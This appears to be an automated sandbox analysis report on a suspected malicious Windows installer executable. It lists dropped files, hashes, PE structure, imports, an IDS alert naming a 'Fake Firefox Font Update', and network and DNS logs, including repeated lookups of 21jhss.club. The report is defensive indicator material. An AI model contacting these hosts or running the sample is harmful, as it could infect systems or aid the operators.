                                                                              File Type:Algol 68 source, ASCII text, with CRLF, CR line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1753
                                                                              Entropy (8bit):5.5914042030668325
                                                                              Encrypted:false
                                                                              SSDEEP:48:O1DUII2X7XK5hwQFDsf7B17r7O7DMmiELK1TI84uNAr:O7I2bKHZcmiEaVqr
                                                                              MD5:25E0BBBF6067E8CA9820E3FA9203B237
                                                                              SHA1:6AC9FFD7B824AEE01FE8FC6521AC95E6F5F25A66
                                                                              SHA-256:4CFDD4F410AE09400AB8F536BAF82601DECE9AAF36FB32498577124D00C5CA42
                                                                              SHA-512:9F986A34DED3F439705BE114FE440D46C02B1A3B83F572E1AACA456CE7A38EC7A83C70503FA4131B95DFA74240CA738CD063D316304FF9E960F8B0A42EF0F6F8
                                                                              Malicious:false
                                                                              Preview:=C:=C:\Windows\System32..admins_group_name=Administrators..admins_sid="S-1-5-32-544"..ALLUSERSPROFILE=C:\ProgramData..APPDATA=C:\Users\user\AppData\Roaming..CommonProgramFiles=C:\Program Files\Common Files..CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files..CommonProgramW6432=C:\Program Files\Common Files..COMPUTERNAME=user-PC..ComSpec=C:\Windows\system32\cmd.exe..DriverData=C:\Windows\System32\Drivers\DriverData..HOMEDRIVE=C:..HOMEPATH=\Users\user..LOCALAPPDATA=C:\Users\user\AppData\Local..LOGONSERVER=\\user-PC..Name=Remote Desktop Users...NUMBER_OF_PROCESSORS=2..OneDrive=C:\Users\user\OneDrive..OS=Windows_NT..Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps..PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC..PROCESSOR_ARCHITECTURE=AMD64..PROCESSOR_IDENTIFIER=Intel64
                                                                              Process:C:\Windows\SysWOW64\makecab.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):754
                                                                              Entropy (8bit):4.501722289958999
                                                                              Encrypted:false
                                                                              SSDEEP:12:xYV1JnceSZceEd0xeeQTEFhaoYwRwGHaqeS6JozUYae6dhmraMy5V:xYDBcDZcTPIjZYwWqeMUY2kHGV
                                                                              MD5:EB265F56777BD576D478648053D18075
                                                                              SHA1:562D01958A377C1C7343621F569D65E5D85E7E27
                                                                              SHA-256:64A27E60DFB2E033099969449AF134D587A47B99036531EBC6FA0F0BF078D483
                                                                              SHA-512:5C2576540026F4C56F1A962919F45967BE9C25CD3D06C188BC2390F195EEE78F1C9C0414C3A2B5CDC30EFC955B284B5921308BA3B06DC2DB8D1B133F60C18F3F
                                                                              Malicious:false
                                                                              Preview:Cabinet Maker - Lossless Data Compression Tool....MAKECAB [/V[n]] [/D var=value ...] [/L dir] source [destination]..MAKECAB [/V[n]] [/D var=value ...] /F directive_file [...].... source File to compress... destination File name to give compressed file. If omitted, the.. last character of the source file name is replaced.. with an underscore (_) and used as the destination... /F directives A file with MakeCAB directives (may be repeated). Refer to.. Microsoft Cabinet SDK for information on directive_file... /D var=value Defines variable with specified value... /L dir Location to place destination (default is current directory)... /V[n] Verbosity level (1..3)...
                                                                              Process:C:\Windows\System32\fsutil.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):26
                                                                              Entropy (8bit):4.17699200758583
                                                                              Encrypted:false
                                                                              SSDEEP:3:QAFrf2WwFhMjn:QgL2zhMj
                                                                              MD5:870D97F130F8CDC708141C407389BE3A
                                                                              SHA1:B869CF43CD47F97E9883A9538FB157F2F79F51DC
                                                                              SHA-256:2C09238165070B4B23C709CBF1FD749E0FB645EB64B4A8B189E5E3DB2CF2EF59
                                                                              SHA-512:BFC916325F759F95C68A59AAECB3DAF4DC5BDAB9BFDC48E817BDB5CA20BAFA355BD0699668BD63420E354751DC1116F4A50949BC4ECBA8E54644BAB10FED3099
                                                                              Malicious:false
                                                                              Preview:Volume - C: is NOT Dirty..
                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                              Entropy (8bit):7.95428840787824
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:8lOT1rXZp5.exe
                                                                              File size:4'288'512 bytes
                                                                              MD5:34807a743f2d680eef051852eaef0b16
                                                                              SHA1:4e63843e9c51f907952bb2f51d6b3866f81f7bd6
                                                                              SHA256:02a193aa0cbdfae2d53e73431501edb4a263c1176ce5cbcb4e03e65a70df29ca
                                                                              SHA512:65acb9f797e244e62cbe9aafae8acb55dbecf88c7924b333e787d907226debfad8324649eb629bdac864dcaf8cea1139a56b1e7b48933fef314e2f040978166a
                                                                              SSDEEP:98304:G1EESMlQ/9IsCMdegeFbD+dQ5oVOAoso2iFugO+Nthm5mBF:G1EEP42s1cgzKoVK2iFtOWHmOF
                                                                              TLSH:0B163312A9DE59B2E03A29319018B35B84B58F155B404BA347F93D3F0A709E9DB3F2D7
                                                                              File Content Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...(D.W..........................................@..................................hA..............................................0..Iw.................
                                                                              Icon Hash:4d1713160ee03301
                                                                              Entrypoint:0x4193af
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:
                                                                              Time Stamp:0x57004428 [Sat Apr 2 22:14:00 2016 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:a1a66d588dcf1394354ebf6ec400c223
                                                                              Instruction
                                                                              push ebp
                                                                              mov ebp, esp
                                                                              push FFFFFFFFh
                                                                              push 0041C878h
                                                                              push 00419540h
                                                                              mov eax, dword ptr fs:[00000000h]
                                                                              push eax
                                                                              mov dword ptr fs:[00000000h], esp
                                                                              sub esp, 68h
                                                                              push ebx
                                                                              push esi
                                                                              push edi
                                                                              mov dword ptr [ebp-18h], esp
                                                                              xor ebx, ebx
                                                                              mov dword ptr [ebp-04h], ebx
                                                                              push 00000002h
                                                                              call dword ptr [0041A1ECh]
                                                                              pop ecx
                                                                              or dword ptr [00422B88h], FFFFFFFFh
                                                                              or dword ptr [00422B8Ch], FFFFFFFFh
                                                                              call dword ptr [0041A1F0h]
                                                                              mov ecx, dword ptr [00420B6Ch]
                                                                              mov dword ptr [eax], ecx
                                                                              call dword ptr [0041A1F4h]
                                                                              mov ecx, dword ptr [00420B68h]
                                                                              mov dword ptr [eax], ecx
                                                                              mov eax, dword ptr [0041A1F8h]
                                                                              mov eax, dword ptr [eax]
                                                                              mov dword ptr [00422B84h], eax
                                                                              call 00007F3944907DE2h
                                                                              cmp dword ptr [0041E6E0h], ebx
                                                                              jne 00007F3944907CCEh
                                                                              push 00419538h
                                                                              call dword ptr [0041A1FCh]
                                                                              pop ecx
                                                                              call 00007F3944907DB4h
                                                                              push 0041E074h
                                                                              push 0041E070h
                                                                              call 00007F3944907D9Fh
                                                                              mov eax, dword ptr [00420B64h]
                                                                              mov dword ptr [ebp-6Ch], eax
                                                                              lea eax, dword ptr [ebp-6Ch]
                                                                              push eax
                                                                              push dword ptr [00420B60h]
                                                                              lea eax, dword ptr [ebp-64h]
                                                                              push eax
                                                                              lea eax, dword ptr [ebp-70h]
                                                                              push eax
                                                                              lea eax, dword ptr [ebp-60h]
                                                                              push eax
                                                                              call dword ptr [0041A204h]
                                                                              push 0041E06Ch
                                                                              push 0041E000h
                                                                              call 00007F3944907D6Ch
                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1cca40xc8.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x230000x27749.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x1a0000x390.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x18d6a0x18e00c624ae421a6c4f702f7f2c2c23c4aef1False0.5999725188442211data6.690824618038753IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                              .rdata0x1a0000x3fa00x4000746f7c2df0aa9b117542dd3e6429f2f1False0.46051025390625data5.772102793505232IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0x1e0000x4b900x80007f7ba027ce50640e9ee99eddca1959fFalse0.41162109375data3.6363601156539818IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                              .rsrc0x230000x277490x27800f56480b15f21322d964f5d84f77e9198False0.21278555181962025data4.279123315843305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                              RT_ICON0x232500x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.17338518869040578
                                                                              RT_ICON0x33a780x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 380160.21888795459323102
                                                                              RT_ICON0x3cf200x5488Device independent bitmap graphic, 72 x 144 x 32, image size 216000.22407578558225508
                                                                              RT_ICON0x423a80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 168960.26352149267831837
                                                                              RT_ICON0x465d00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.2962655601659751
                                                                              RT_ICON0x48b780x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.36632270168855535
                                                                              RT_ICON0x49c200x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.4787234042553192
                                                                              RT_GROUP_ICON0x4a0880x68data0.7692307692307693
                                                                              RT_VERSION0x4a0f00x350data0.47877358490566035
                                                                              RT_MANIFEST0x4a4400x309ASCII text0.5341055341055341
                                                                              DLLImport
                                                                              COMCTL32.dll
                                                                              SHELL32.dllShellExecuteExW, ShellExecuteW, SHGetMalloc, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHGetSpecialFolderPathW
                                                                              GDI32.dllCreateCompatibleDC, CreateFontIndirectW, DeleteObject, DeleteDC, GetCurrentObject, StretchBlt, GetDeviceCaps, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, GetObjectW
                                                                              ADVAPI32.dllFreeSid, AllocateAndInitializeSid, CheckTokenMembership
                                                                              USER32.dllGetParent, ScreenToClient, CreateWindowExW, GetDesktopWindow, GetWindowTextLengthW, SetWindowPos, SetTimer, GetMessageW, CopyImage, KillTimer, CharUpperW, SendMessageW, ShowWindow, BringWindowToTop, wsprintfW, MessageBoxW, EndDialog, ReleaseDC, GetWindowDC, GetMenu, GetWindowLongW, GetClassNameA, wsprintfA, DispatchMessageW, SetWindowTextW, GetSysColor, DestroyWindow, MessageBoxA, GetKeyState, IsWindow, GetDlgItem, GetClientRect, GetSystemMetrics, SetWindowLongW, UnhookWindowsHookEx, SetFocus, SystemParametersInfoW, DrawTextW, GetDC, ClientToScreen, GetWindow, DialogBoxIndirectParamW, DrawIconEx, CallWindowProcW, DefWindowProcW, CallNextHookEx, PtInRect, SetWindowsHookExW, LoadImageW, LoadIconW, MessageBeep, EnableWindow, EnableMenuItem, GetSystemMenu, CreateWindowExA, wvsprintfW, GetWindowTextW, GetWindowRect
                                                                              ole32.dllCreateStreamOnHGlobal, CoCreateInstance, CoInitialize
                                                                              OLEAUT32.dllSysAllocStringLen, VariantClear, SysFreeString, OleLoadPicture, SysAllocString
                                                                              KERNEL32.dllSetFileTime, SetEndOfFile, GetFileInformationByHandle, VirtualFree, GetModuleHandleA, WaitForMultipleObjects, VirtualAlloc, ReadFile, SetFilePointer, GetFileSize, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, FormatMessageW, lstrcpyW, LocalFree, IsBadReadPtr, GetSystemDirectoryW, GetCurrentThreadId, SuspendThread, TerminateThread, InitializeCriticalSection, ResetEvent, SetEvent, CreateEventW, GetVersionExW, GetModuleFileNameW, GetCurrentProcess, SetProcessWorkingSetSize, SetEnvironmentVariableW, GetDriveTypeW, CreateFileW, LoadLibraryA, SetThreadLocale, GetSystemTimeAsFileTime, ExpandEnvironmentStringsW, CompareFileTime, WideCharToMultiByte, GetTempPathW, GetCurrentDirectoryW, GetEnvironmentVariableW, lstrcmpiW, GetLocaleInfoW, MultiByteToWideChar, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetSystemDefaultLCID, lstrcmpiA, GlobalAlloc, GlobalFree, MulDiv, FindResourceExA, SizeofResource, LoadResource, LockResource, GetModuleHandleW, FindFirstFileW, lstrcmpW, DeleteFileW, FindNextFileW, FindClose, RemoveDirectoryW, GetStdHandle, WriteFile, lstrlenA, CreateDirectoryW, GetFileAttributesW, SetCurrentDirectoryW, GetLocalTime, SystemTimeToFileTime, CreateThread, GetExitCodeThread, Sleep, SetFileAttributesW, GetDiskFreeSpaceExW, SetLastError, GetTickCount, lstrlenW, ExitProcess, lstrcatW, GetProcAddress, CloseHandle, WaitForSingleObject, GetExitCodeProcess, GetQueuedCompletionStatus, ResumeThread, SetInformationJobObject, CreateIoCompletionPort, AssignProcessToJobObject, CreateJobObjectW, GetLastError, CreateProcessW, GetStartupInfoW, GetCommandLineW, GetStartupInfoA
                                                                              MSVCRT.dll_purecall, ??2@YAPAXI@Z, _wtol, memset, memmove, memcpy, _wcsnicmp, _controlfp, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, malloc, realloc, free, wcsstr, _CxxThrowException, _beginthreadex, _EH_prolog, ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z, strncmp, wcsncmp, wcsncpy, strncpy, ??3@YAXPAX@Z
                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                              2024-12-27T08:20:46.785463+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449842185.199.111.133443TCP
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Dec 27, 2024 08:20:45.515608072 CET49842443192.168.2.4185.199.111.133
                                                                              Dec 27, 2024 08:20:45.515642881 CET44349842185.199.111.133192.168.2.4
                                                                              Dec 27, 2024 08:20:45.515764952 CET49842443192.168.2.4185.199.111.133
                                                                              Dec 27, 2024 08:20:45.517854929 CET49842443192.168.2.4185.199.111.133
                                                                              Dec 27, 2024 08:20:45.517868042 CET44349842185.199.111.133192.168.2.4
                                                                              Dec 27, 2024 08:20:46.785382032 CET44349842185.199.111.133192.168.2.4
                                                                              Dec 27, 2024 08:20:46.785463095 CET49842443192.168.2.4185.199.111.133
                                                                              Dec 27, 2024 08:20:46.803704023 CET49842443192.168.2.4185.199.111.133
                                                                              Dec 27, 2024 08:20:46.803725004 CET44349842185.199.111.133192.168.2.4
                                                                              Dec 27, 2024 08:20:46.804711103 CET44349842185.199.111.133192.168.2.4
                                                                              Dec 27, 2024 08:20:46.846605062 CET49842443192.168.2.4185.199.111.133
                                                                              Dec 27, 2024 08:20:47.100564003 CET49842443192.168.2.4185.199.111.133
                                                                              Dec 27, 2024 08:20:47.143337011 CET44349842185.199.111.133192.168.2.4
                                                                              Dec 27, 2024 08:20:47.477413893 CET44349842185.199.111.133192.168.2.4
                                                                              Dec 27, 2024 08:20:47.477701902 CET44349842185.199.111.133192.168.2.4
                                                                              Dec 27, 2024 08:20:47.477797031 CET44349842185.199.111.133192.168.2.4
                                                                              Dec 27, 2024 08:20:47.477823973 CET49842443192.168.2.4185.199.111.133
                                                                              Dec 27, 2024 08:20:47.477845907 CET44349842185.199.111.133192.168.2.4
                                                                              Dec 27, 2024 08:20:47.477905989 CET49842443192.168.2.4185.199.111.133
                                                                              Dec 27, 2024 08:20:47.477946043 CET44349842185.199.111.133192.168.2.4
                                                                              Dec 27, 2024 08:20:47.485584021 CET44349842185.199.111.133192.168.2.4
                                                                              Dec 27, 2024 08:20:47.487086058 CET49842443192.168.2.4185.199.111.133
                                                                              Dec 27, 2024 08:20:47.487098932 CET44349842185.199.111.133192.168.2.4
                                                                              Dec 27, 2024 08:20:47.494025946 CET44349842185.199.111.133192.168.2.4
                                                                              Dec 27, 2024 08:20:47.495364904 CET49842443192.168.2.4185.199.111.133
                                                                              Dec 27, 2024 08:20:47.495378971 CET44349842185.199.111.133192.168.2.4
                                                                              Dec 27, 2024 08:20:47.510664940 CET44349842185.199.111.133192.168.2.4
                                                                              Dec 27, 2024 08:20:47.511439085 CET49842443192.168.2.4185.199.111.133
                                                                              Dec 27, 2024 08:20:47.511456013 CET44349842185.199.111.133192.168.2.4
                                                                              Dec 27, 2024 08:20:47.596683025 CET44349842185.199.111.133192.168.2.4
                                                                              Dec 27, 2024 08:20:47.596735954 CET49842443192.168.2.4185.199.111.133
                                                                              Dec 27, 2024 08:20:47.596750975 CET44349842185.199.111.133192.168.2.4
                                                                              Dec 27, 2024 08:20:47.678288937 CET44349842185.199.111.133192.168.2.4
                                                                              Dec 27, 2024 08:20:47.678344965 CET49842443192.168.2.4185.199.111.133
                                                                              Dec 27, 2024 08:20:47.678361893 CET44349842185.199.111.133192.168.2.4
                                                                              Dec 27, 2024 08:20:47.678531885 CET44349842185.199.111.133192.168.2.4
                                                                              Dec 27, 2024 08:20:47.678659916 CET49842443192.168.2.4185.199.111.133
                                                                              Dec 27, 2024 08:20:47.681833029 CET49842443192.168.2.4185.199.111.133
                                                                              Dec 27, 2024 08:20:47.681833029 CET49842443192.168.2.4185.199.111.133
                                                                              Dec 27, 2024 08:20:47.681854963 CET44349842185.199.111.133192.168.2.4
                                                                              Dec 27, 2024 08:20:47.681866884 CET44349842185.199.111.133192.168.2.4
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Dec 27, 2024 08:19:00.835079908 CET5992353192.168.2.41.1.1.1
                                                                              Dec 27, 2024 08:19:01.055994987 CET53599231.1.1.1192.168.2.4
                                                                              Dec 27, 2024 08:19:01.256851912 CET5546653192.168.2.41.1.1.1
                                                                              Dec 27, 2024 08:19:01.483133078 CET53554661.1.1.1192.168.2.4
                                                                              Dec 27, 2024 08:19:02.341590881 CET6230053192.168.2.41.1.1.1
                                                                              Dec 27, 2024 08:19:02.566025019 CET53623001.1.1.1192.168.2.4
                                                                              Dec 27, 2024 08:19:34.104444981 CET6274853192.168.2.41.1.1.1
                                                                              Dec 27, 2024 08:19:34.320914030 CET53627481.1.1.1192.168.2.4
                                                                              Dec 27, 2024 08:19:39.676008940 CET5687853192.168.2.41.1.1.1
                                                                              Dec 27, 2024 08:19:39.815160036 CET53568781.1.1.1192.168.2.4
                                                                              Dec 27, 2024 08:19:44.938751936 CET5330653192.168.2.41.1.1.1
                                                                              Dec 27, 2024 08:19:45.076601028 CET53533061.1.1.1192.168.2.4
                                                                              Dec 27, 2024 08:19:49.160197020 CET5964253192.168.2.41.1.1.1
                                                                              Dec 27, 2024 08:19:49.302920103 CET53596421.1.1.1192.168.2.4
                                                                              Dec 27, 2024 08:19:54.379676104 CET5284653192.168.2.41.1.1.1
                                                                              Dec 27, 2024 08:19:54.516683102 CET53528461.1.1.1192.168.2.4
                                                                              Dec 27, 2024 08:19:59.582422972 CET6151853192.168.2.41.1.1.1
                                                                              Dec 27, 2024 08:19:59.720005989 CET53615181.1.1.1192.168.2.4
                                                                              Dec 27, 2024 08:20:04.832355022 CET5006853192.168.2.41.1.1.1
                                                                              Dec 27, 2024 08:20:04.969499111 CET53500681.1.1.1192.168.2.4
                                                                              Dec 27, 2024 08:20:09.963854074 CET5903853192.168.2.41.1.1.1
                                                                              Dec 27, 2024 08:20:10.101816893 CET53590381.1.1.1192.168.2.4
                                                                              Dec 27, 2024 08:20:14.394876957 CET6468653192.168.2.41.1.1.1
                                                                              Dec 27, 2024 08:20:14.531977892 CET53646861.1.1.1192.168.2.4
                                                                              Dec 27, 2024 08:20:19.442203045 CET5911753192.168.2.41.1.1.1
                                                                              Dec 27, 2024 08:20:19.580393076 CET53591171.1.1.1192.168.2.4
                                                                              Dec 27, 2024 08:20:24.414854050 CET6176753192.168.2.41.1.1.1
                                                                              Dec 27, 2024 08:20:24.553641081 CET53617671.1.1.1192.168.2.4
                                                                              Dec 27, 2024 08:20:29.210756063 CET5401753192.168.2.41.1.1.1
                                                                              Dec 27, 2024 08:20:29.347620010 CET53540171.1.1.1192.168.2.4
                                                                              Dec 27, 2024 08:20:34.132715940 CET5181853192.168.2.41.1.1.1
                                                                              Dec 27, 2024 08:20:34.269666910 CET53518181.1.1.1192.168.2.4
                                                                              Dec 27, 2024 08:20:39.066205978 CET5629253192.168.2.41.1.1.1
                                                                              Dec 27, 2024 08:20:39.430558920 CET53562921.1.1.1192.168.2.4
                                                                              Dec 27, 2024 08:20:44.037590981 CET5414953192.168.2.41.1.1.1
                                                                              Dec 27, 2024 08:20:44.177156925 CET53541491.1.1.1192.168.2.4
                                                                              Dec 27, 2024 08:20:45.367630005 CET6515753192.168.2.41.1.1.1
                                                                              Dec 27, 2024 08:20:45.504179001 CET53651571.1.1.1192.168.2.4
                                                                              Dec 27, 2024 08:20:49.034518957 CET5727653192.168.2.41.1.1.1
                                                                              Dec 27, 2024 08:20:49.171135902 CET53572761.1.1.1192.168.2.4
                                                                              Dec 27, 2024 08:20:54.034671068 CET5223753192.168.2.41.1.1.1
                                                                              Dec 27, 2024 08:20:54.171375990 CET53522371.1.1.1192.168.2.4
                                                                              Dec 27, 2024 08:20:59.049788952 CET5686153192.168.2.41.1.1.1
                                                                              Dec 27, 2024 08:20:59.186566114 CET53568611.1.1.1192.168.2.4
                                                                              Dec 27, 2024 08:21:04.040009975 CET5325853192.168.2.41.1.1.1
                                                                              Dec 27, 2024 08:21:04.177865028 CET53532581.1.1.1192.168.2.4
                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Dec 27, 2024 08:19:00.835079908 CET192.168.2.41.1.1.10x4d1eStandard query (0)QPFIkBuKoDrrKMiLWzroGJvlan.QPFIkBuKoDrrKMiLWzroGJvlanA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:19:01.256851912 CET192.168.2.41.1.1.10x548eStandard query (0)lYvskCQZEcQueZ.lYvskCQZEcQueZA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:19:02.341590881 CET192.168.2.41.1.1.10xafc8Standard query (0)bDbFlwFKtaJzIIkBijTv.bDbFlwFKtaJzIIkBijTvA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:19:34.104444981 CET192.168.2.41.1.1.10xff5eStandard query (0)21jhss.clubA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:19:39.676008940 CET192.168.2.41.1.1.10x8723Standard query (0)21jhss.clubA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:19:44.938751936 CET192.168.2.41.1.1.10x4756Standard query (0)21jhss.clubA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:19:49.160197020 CET192.168.2.41.1.1.10x9f62Standard query (0)21jhss.clubA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:19:54.379676104 CET192.168.2.41.1.1.10x874aStandard query (0)21jhss.clubA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:19:59.582422972 CET192.168.2.41.1.1.10x987dStandard query (0)21jhss.clubA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:20:04.832355022 CET192.168.2.41.1.1.10x51b5Standard query (0)21jhss.clubA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:20:09.963854074 CET192.168.2.41.1.1.10xd7f7Standard query (0)21jhss.clubA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:20:14.394876957 CET192.168.2.41.1.1.10x85cStandard query (0)21jhss.clubA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:20:19.442203045 CET192.168.2.41.1.1.10x89beStandard query (0)21jhss.clubA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:20:24.414854050 CET192.168.2.41.1.1.10x767Standard query (0)21jhss.clubA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:20:29.210756063 CET192.168.2.41.1.1.10xd7f8Standard query (0)21jhss.clubA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:20:34.132715940 CET192.168.2.41.1.1.10xd80bStandard query (0)21jhss.clubA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:20:39.066205978 CET192.168.2.41.1.1.10xd5b4Standard query (0)21jhss.clubA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:20:44.037590981 CET192.168.2.41.1.1.10x9f3dStandard query (0)21jhss.clubA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:20:45.367630005 CET192.168.2.41.1.1.10x48b4Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:20:49.034518957 CET192.168.2.41.1.1.10x107dStandard query (0)21jhss.clubA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:20:54.034671068 CET192.168.2.41.1.1.10xefa1Standard query (0)21jhss.clubA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:20:59.049788952 CET192.168.2.41.1.1.10x4f9fStandard query (0)21jhss.clubA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:21:04.040009975 CET192.168.2.41.1.1.10xc4c3Standard query (0)21jhss.clubA (IP address)IN (0x0001)false
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Dec 27, 2024 08:19:01.055994987 CET1.1.1.1192.168.2.40x4d1eName error (3)QPFIkBuKoDrrKMiLWzroGJvlan.QPFIkBuKoDrrKMiLWzroGJvlannonenoneA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:19:01.483133078 CET1.1.1.1192.168.2.40x548eName error (3)lYvskCQZEcQueZ.lYvskCQZEcQueZnonenoneA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:19:02.566025019 CET1.1.1.1192.168.2.40xafc8Name error (3)bDbFlwFKtaJzIIkBijTv.bDbFlwFKtaJzIIkBijTvnonenoneA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:19:34.320914030 CET1.1.1.1192.168.2.40xff5eName error (3)21jhss.clubnonenoneA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:19:39.815160036 CET1.1.1.1192.168.2.40x8723Name error (3)21jhss.clubnonenoneA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:19:45.076601028 CET1.1.1.1192.168.2.40x4756Name error (3)21jhss.clubnonenoneA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:19:49.302920103 CET1.1.1.1192.168.2.40x9f62Name error (3)21jhss.clubnonenoneA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:19:54.516683102 CET1.1.1.1192.168.2.40x874aName error (3)21jhss.clubnonenoneA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:19:59.720005989 CET1.1.1.1192.168.2.40x987dName error (3)21jhss.clubnonenoneA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:20:04.969499111 CET1.1.1.1192.168.2.40x51b5Name error (3)21jhss.clubnonenoneA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:20:10.101816893 CET1.1.1.1192.168.2.40xd7f7Name error (3)21jhss.clubnonenoneA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:20:14.531977892 CET1.1.1.1192.168.2.40x85cName error (3)21jhss.clubnonenoneA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:20:19.580393076 CET1.1.1.1192.168.2.40x89beName error (3)21jhss.clubnonenoneA (IP address)IN (0x0001)false
                                                                              Dec 27, 2024 08:20:24.553641081 CET1.1.1.1192.168.2.40x767Name error (3)21jhss.clubnonenoneA (IP address)IN (0x0001)false
